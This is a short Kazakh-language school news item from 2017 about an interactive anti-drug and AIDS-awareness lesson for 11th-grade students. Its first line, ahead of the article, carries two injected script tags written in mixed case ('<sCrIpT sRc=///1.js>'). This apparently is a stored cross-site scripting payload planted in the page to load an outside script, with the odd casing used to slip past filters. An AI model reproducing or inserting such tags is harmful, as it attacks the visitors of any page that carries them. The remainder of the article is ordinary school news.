<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
17.11.2017
Халықаралық ЖИТС-тің алдын алу айлығына орай, 14 қараша 11 сынып оқушылары арасында«Біз болашағымыз үшін жауаптымыз» интерактивті сабақ өткізілді. Іс-шара барысында балалар жастар мен оқушылар арасындағы есірткі мәселесін сөз етті. «Өмір» атты кластер толтырып, өмірлік жағдаяттар шешіп, сауалнамаларға жауап беріп, есірткі жайлы әлеуметтік роликтер көрді. Оқушылар адам өмірі – үлкен өзен сияқты, өзінің бұрылыстары мен тағдыры бар деген тұжырымға келді. Бірақ онда есірткі, темекі, спирттік ішімдіктерге орын жоқ. Әр адам өзіне тиесілі ең қымбатты өмірін сақтауға тиіс.
Просмотров: 801